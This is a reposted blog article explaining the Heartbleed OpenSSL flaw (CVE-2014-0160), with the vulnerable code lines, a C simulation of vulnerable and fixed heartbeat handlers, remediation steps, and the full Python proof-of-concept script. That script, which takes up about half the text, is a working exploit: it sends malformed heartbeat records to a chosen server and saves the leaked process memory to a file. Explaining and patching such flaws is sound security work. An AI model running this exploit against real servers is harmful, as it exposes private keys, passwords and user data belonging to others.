Copyright notice: please credit the source when reposting: http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396350

Heartbleed (CVE-2014-0160).

The vulnerability lies in OpenSSL's implementation of the heartbeat extension for the TLS/DTLS (transport layer security) protocols. Each malicious heartbeat request can leak up to 64 KB of the server process's memory (the payload length field is 16 bits wide), and that memory may contain usernames, passwords, private keys and other sensitive data.


What heartbeats are for

The heartbeat extension (RFC 6520) is a keep-alive: one peer sends a HeartbeatRequest carrying an arbitrary payload, and the other must answer with a HeartbeatResponse that echoes exactly that payload back.

Affected versions: OpenSSL 1.0.1 through 1.0.1f are vulnerable.
Heartbeat data structure

/* Schematic view of a heartbeat message; OpenSSL itself parses the bytes in place rather than using such a struct. */
struct hb {
int type;            /* heartbeat type: 1 = request, 2 = response */
int length;          /* number of bytes in data */
unsigned char *data; /* type byte, 2-byte payload length, then the payload */
};

type is the heartbeat type and length is the size of data. The bytes of data are laid out as a 1-byte type field, a 2-byte payload length field (big-endian; this is the variable OpenSSL calls `payload`), and then the payload content itself.

Layout of data

  Offset   Field
  0        type: the heartbeat type
  1-2      payload: the length, in bytes, of the content that follows
  3-len    pl: the content itself

Suppose, schematically, the client sends the data "007abcdefg". The server parses type=0, payload=07 and pl='abcdefg', allocates (1+2+7=10) bytes (ignoring the 16 bytes of padding the real code adds), and then writes type, payload and pl into the newly allocated memory. The flaw is that nothing checks that the length claimed in payload matches the number of bytes actually received: a request that claims a large payload but carries only a few bytes makes the server copy the claimed amount, and everything beyond the request in memory is sent back in the response.

Vulnerable code (function dtls1_process_heartbeat in ssl/d1_both.c of OpenSSL; the TLS counterpart tls1_process_heartbeat in ssl/t1_lib.c has the same flaw)
………….
buffer = OPENSSL_malloc(1 + 2 + payload + padding); // allocate according to the attacker-supplied payload length; the extra 3 bytes hold the type and length
………….
memcpy(bp, pl, payload); // fill the response payload: copies `payload` bytes starting at the request's content, with no check against the record's real length
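The layout above and the two quoted lines, worked through as an added example in C that is not OpenSSL's code: it models the heartbeat handler over a constructed 4 KB array standing in for process memory, with a constructed secret placed right after the received record. `conn_mem`, `SECRET`, `build_heartbeat`, `build_response`, `process_heartbeat_vuln`, `process_heartbeat_fixed` and `heartbeat_run` are this example's own names; the length checks in the fixed handler mirror the ones added in OpenSSL 1.0.1g, and the padding is zeroed here instead of being drawn from RAND_pseudo_bytes.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define TLS1_HB_REQUEST  1
#define TLS1_HB_RESPONSE 2
#define HB_PADDING       16   /* RFC 6520: at least 16 bytes of padding */

/* Constructed stand-in for process memory: the received record is laid out
 * at the start and an unrelated secret sits right behind it. */
static unsigned char conn_mem[4096];
static const char SECRET[] = "PRIVATE KEY: -----BEGIN RSA PRIVATE KEY-----";

/* Encode a heartbeat the way the PoC's bytes do: type || length (big endian)
 * || payload || padding.  `claimed` goes into the length field and need not
 * match payload_len; that mismatch is the attack.  Returns the record length. */
size_t build_heartbeat(unsigned char *out, unsigned short claimed,
                       const unsigned char *payload, size_t payload_len) {
    out[0] = TLS1_HB_REQUEST;
    out[1] = (unsigned char)(claimed >> 8);            /* s2n() in OpenSSL */
    out[2] = (unsigned char)(claimed & 0xff);
    memcpy(out + 3, payload, payload_len);
    memset(out + 3 + payload_len, 0, HB_PADDING);
    return 3 + payload_len + HB_PADDING;
}

/* The lines quoted from dtls1_process_heartbeat above.  Caller frees *resp. */
static int build_response(const unsigned char *pl, unsigned int payload,
                          unsigned char **resp) {
    unsigned char *buffer = malloc(1 + 2 + payload + HB_PADDING);
    unsigned char *bp = buffer;
    if (buffer == NULL) return -1;
    *bp++ = TLS1_HB_RESPONSE;
    *bp++ = (unsigned char)(payload >> 8);
    *bp++ = (unsigned char)(payload & 0xff);
    memcpy(bp, pl, payload);   /* copies `payload` bytes from wherever pl points */
    memset(bp + payload, 0, HB_PADDING);   /* OpenSSL uses RAND_pseudo_bytes */
    *resp = buffer;
    return 1 + 2 + (int)payload + HB_PADDING;
}

/* 1.0.1 - 1.0.1f: the length field is trusted and record_len is never
 * consulted, so memcpy reads `payload` bytes past the end of the record. */
int process_heartbeat_vuln(const unsigned char *p, size_t record_len,
                           unsigned char **resp) {
    unsigned char hbtype = *p++;
    unsigned int payload = (p[0] << 8) | p[1];         /* n2s(p, payload) */
    (void)record_len;                                  /* unused: the bug */
    if (hbtype != TLS1_HB_REQUEST) return -1;
    return build_response(p + 2, payload, resp);
}

/* 1.0.1g: drop the message unless header + claimed length + padding fit in
 * the record that was actually received. */
int process_heartbeat_fixed(const unsigned char *p, size_t record_len,
                            unsigned char **resp) {
    unsigned char hbtype;
    unsigned int payload;
    if (record_len < 1 + 2 + HB_PADDING) return -1;    /* silently discard */
    hbtype = *p++;
    payload = (p[0] << 8) | p[1];
    if (1 + 2 + payload + HB_PADDING > record_len) return -1;   /* the fix */
    if (hbtype != TLS1_HB_REQUEST) return -1;
    return build_response(p + 2, payload, resp);
}

static int contains(const unsigned char *hay, size_t n, const char *needle) {
    size_t m = strlen(needle);
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(hay + i, needle, m) == 0) return 1;
    return 0;
}

/* Run one request with the given length field through either handler.
 * Returns 1 if the response carries SECRET, else 0; *resp_len receives the
 * response length, or -1 when the request was dropped. */
int heartbeat_run(int use_fixed, unsigned short claimed, int *resp_len) {
    const unsigned char payload[] = "hello";   /* 5 real payload bytes */
    unsigned char *resp = NULL;
    int n, leaked = 0;
    memset(conn_mem, 0, sizeof conn_mem);
    size_t rec_len = build_heartbeat(conn_mem, claimed, payload, 5);
    memcpy(conn_mem + rec_len, SECRET, sizeof SECRET);   /* adjacent memory */
    n = use_fixed ? process_heartbeat_fixed(conn_mem, rec_len, &resp)
                  : process_heartbeat_vuln(conn_mem, rec_len, &resp);
    if (n > 0) { leaked = contains(resp + 3, (size_t)n - 3, SECRET); free(resp); }
    *resp_len = n;
    return leaked;
}

int main(void) {
    int n, leak;
    leak = heartbeat_run(0, 1024, &n);
    printf("vulnerable, length field 1024: leaked=%d, response=%d bytes\n", leak, n);
    leak = heartbeat_run(1, 1024, &n);
    printf("fixed,      length field 1024: leaked=%d, response=%d (dropped)\n", leak, n);
    leak = heartbeat_run(1, 5, &n);
    printf("fixed,      honest length 5:   leaked=%d, response=%d bytes\n", leak, n);
    return 0;
}
```

The request with an honest length of 5 is answered by both handlers with a 24-byte response (3-byte header, 5 payload bytes, 16 bytes of padding). With the length field set to 1024 the vulnerable handler answers with 1043 bytes that include the secret placed after the record, while the fixed handler drops the request because 1 + 2 + 1024 + 16 exceeds the 24 bytes that were actually received.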

Exploit (the nmap script tests without dumping memory; the PoC script listed below dumps what the server returns):

nmap --script=ssl-heartbleed -p 443 www.example.com
python heartbleed-poc.py -p 443 www.example.com

Further reading:
1)http://www.freebuf.com/sectool/32785.html
2)http://heartbleed.com/
3)http://www.cnblogs.com/milantgh/p/3728350.html

Fixes:
1) Upgrade to OpenSSL 1.0.1g or later, then restart every service that has the old library loaded.
2) Rebuild OpenSSL with the heartbeat extension disabled by passing -DOPENSSL_NO_HEARTBEATS at compile time (e.g. ./config -DOPENSSL_NO_HEARTBEATS).
3) Assume the private key may already have been read out of memory: generate a new key, reissue the certificate and revoke the old one, so that a stolen key cannot be used for man-in-the-middle attacks. Revoking the certificate without changing the key does not help.

heartbleed-poc.py:

#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 originally by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin)
# Python 2 script (print statements, str.decode('hex')).

import sys
import struct
import socket
import time
import select
from optparse import OptionParser
import smtplib

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-n', '--num', type='int', default=1, help='Number of heartbeats to send if vulnerable (defines how much memory you get back) (default: 1)')
options.add_option('-f', '--file', type='str', default='dump.bin', help='Filename to write dumped memory to (default: dump.bin)')
options.add_option('-q', '--quiet', default=False, help='Do not display the memory dump', action='store_true')
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS (smtp only right now)')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

# TLS 1.1 ClientHello record: offers a wide cipher-suite list and the
# heartbeat extension (00 0f 00 01 01 at the end) so the server enables heartbeats.
hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

# Malicious heartbeat records, one per TLS version: record type 0x18 (heartbeat),
# record length 3, then type 01 (request) and claimed payload length 0x4000
# (16384 bytes) with no payload bytes actually present.
hbv10 = h2bin('''
18 03 01 00 03
01 40 00
''')

hbv11 = h2bin('''
18 03 02 00 03
01 40 00
''')

hbv12 = h2bin('''
18 03 03 00 03
01 40 00
''')

def hexdump(s, dumpf, quiet):
    # Append the raw bytes to the dump file, then print a hex/ASCII view.
    dump = open(dumpf, 'ab')
    dump.write(s)
    dump.close()
    if quiet: return
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.') for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=5):
    # Read exactly `length` bytes, or whatever arrived before the timeout.
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            if not rdata:
                return None
            else:
                return rdata
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata

def recvmsg(s):
    # Read one TLS record: 5-byte header (type, version, length) then the body.
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s, dumpf, host, quiet):
    # Wait for the heartbeat response (record type 24) or an alert (21).
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received from ' + host + ', server likely not vulnerable'
            return False

        if typ == 24:
            if not quiet: print 'Received heartbeat response:'
            hexdump(pay, dumpf, quiet)
            if len(pay) > 3:
                print 'WARNING: server ' + host + ' returned more data than it should - server is vulnerable!'
            else:
                print 'Server ' + host + ' processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            if not quiet: print 'Received alert:'
            hexdump(pay, dumpf, quiet)
            print 'Server ' + host + ' returned error, likely not vulnerable'
            return False

def connect(host, port, quiet):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if not quiet: print 'Connecting...'
    sys.stdout.flush()
    s.connect((host, port))
    return s

def tls(s, quiet):
    if not quiet: print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    if not quiet: print 'Waiting for Server Hello...'
    sys.stdout.flush()

def parseresp(s):
    # Consume handshake records until ServerHelloDone; return the record version.
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return 0
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            return ver

def check(host, port, dumpf, quiet, starttls):
    response = False
    if starttls:
        try:
            s = smtplib.SMTP(host=host, port=port)
            s.ehlo()
            s.starttls()
        except smtplib.SMTPException:
            print 'STARTTLS not supported...'
            s.quit()
            return False
        print 'STARTTLS supported...'
        s.quit()
        s = connect(host, port, quiet)
        s.settimeout(1)
        try:
            resp = s.recv(1024)
            s.send('ehlo starttlstest\r\n')
            resp = s.recv(1024)
            s.send('starttls\r\n')
            resp = s.recv(1024)
        except socket.timeout:
            print 'Timeout issues, going ahead anyway, but it is probably broken ...'
        tls(s, quiet)
    else:
        s = connect(host, port, quiet)
        tls(s, quiet)

    version = parseresp(s)

    if version == 0:
        if not quiet: print "Got an error while parsing the response, bailing ..."
        return False
    else:
        version = version - 0x0300
        # Record version 0x0301 is TLS 1.0, 0x0302 is TLS 1.1, 0x0303 is TLS 1.2.
        if not quiet: print "Server TLS version was 1.%d\n" % (version - 1)

    if not quiet: print 'Sending heartbeat request...'
    sys.stdout.flush()
    # The heartbeat record's version must match the negotiated one.
    if (version == 1):
        s.send(hbv10)
        response = hit_hb(s, dumpf, host, quiet)
    if (version == 2):
        s.send(hbv11)
        response = hit_hb(s, dumpf, host, quiet)
    if (version == 3):
        s.send(hbv12)
        response = hit_hb(s, dumpf, host, quiet)

    s.close()
    return response

def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    print 'Scanning ' + args[0] + ' on port ' + str(opts.port)
    for i in xrange(0, opts.num):
        check(args[0], opts.port, opts.file, opts.quiet, opts.starttls)

if __name__ == '__main__':
    main()
